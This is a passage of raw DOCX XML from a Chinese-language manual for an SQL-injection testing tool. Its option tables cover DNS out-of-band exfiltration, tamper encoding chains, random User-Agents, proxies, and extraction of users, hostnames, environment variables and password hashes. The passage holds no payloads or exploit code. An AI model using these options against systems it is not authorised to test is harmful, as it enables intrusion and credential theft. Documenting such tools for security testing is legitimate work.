                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--dbms=DBMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7218"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="796AD3F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>指定数据库类型收窄检测（mysql / mssql / pgsql / sqlite / oracle / access / db2 / dameng）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2526"/>
          </w:tcPr>
          <w:p w14:paraId="4086F8AA">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--smart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7218"/>
          </w:tcPr>
          <w:p w14:paraId="0E15B4C0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>智能模式（高命中用例优先 + 启发式判断）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2526"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="608398DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--exhaustive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7218"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7289C7E8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>穷举模式（不剪枝跑完全部用例）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2526"/>
          </w:tcPr>
          <w:p w14:paraId="66EAEDF0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--dns-domain=DOMAIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7218"/>
          </w:tcPr>
          <w:p w14:paraId="647B8028">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DNS 外带域名（配合 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--technique=D</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2526"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="49C0A0FC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--dns-token=TOKEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7218"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="479A5518">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DNSLog 平台 token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2526"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--parallel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7218"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>多参数并行检测（并发度取 --threads，上限 10）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15610908">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="065B909E">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2706"/>
        <w:gridCol w:w="7039"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2706"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="29CFCA48">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7038"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="778F663E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2706"/>
          </w:tcPr>
          <w:p w14:paraId="7491F78A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--proxy=PROXY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7038"/>
          </w:tcPr>
          <w:p w14:paraId="7B48BFA8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>代理（http:// / socks5://）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2706"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5E8D9EA0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--timeout=秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7038"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="40588D84">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>超时时间（默认 15）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2706"/>
          </w:tcPr>
          <w:p w14:paraId="53005192">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--retries=次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7038"/>
          </w:tcPr>
          <w:p w14:paraId="3D0129D0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>失败重试（默认 1）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2706"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="30998420">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--delay=毫秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7038"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4A0F5766">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>请求间隔延时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2706"/>
          </w:tcPr>
          <w:p w14:paraId="0C165AB2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--threads=N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7038"/>
          </w:tcPr>
          <w:p w14:paraId="6DF41148">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>盲注多线程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2706"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7EA942F8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--random-agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7038"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="00E5E062">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>随机 User-Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2706"/>
          </w:tcPr>
          <w:p w14:paraId="713BDE1C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--user-agent=UA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7038"/>
          </w:tcPr>
          <w:p w14:paraId="4C70D524">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>指定 User-Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2706"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2334A9D4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--tamper=A,B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7038"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="45FFE4A8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>编码处理链（内置名/key 或 rules 目录自定义脚本名，逗号分隔链式组合）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2706"/>
          </w:tcPr>
          <w:p w14:paraId="04B25B44">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--follow-redirects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7038"/>
          </w:tcPr>
          <w:p w14:paraId="6EF98670">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>跟随 302 跳转</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2706"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--rules-dir=DIR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7038"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>规则库目录（默认 config/rules/，与 GUI 共用：自定义 tamper/动态规则/字符替换/代理池）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A0341E6">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B19192">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>取数动作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4872"/>
        <w:gridCol w:w="4873"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="3A3DFA9C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="5344FCC8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
          </w:tcPr>
          <w:p w14:paraId="283D7BD8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--banner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
          </w:tcPr>
          <w:p w14:paraId="36296AC2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>数据库版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5AAC8BEE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--current-user</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--current-db</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--hostname</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--is-dba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="34118E0C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>当前用户 / 当前库 / 主机名 / 是否 DBA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
          </w:tcPr>
          <w:p w14:paraId="3220DEEA">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--env</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
          </w:tcPr>
          <w:p w14:paraId="497C77E4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>全部环境变量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="28BBF33C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="0DAE7F38">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>读取账户 Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
          </w:tcPr>
          <w:p w14:paraId="17D50C9C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
          </w:tcPr>
          <w:p w14:paraId="47302664">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>枚举权限角色</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="68C3F63A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
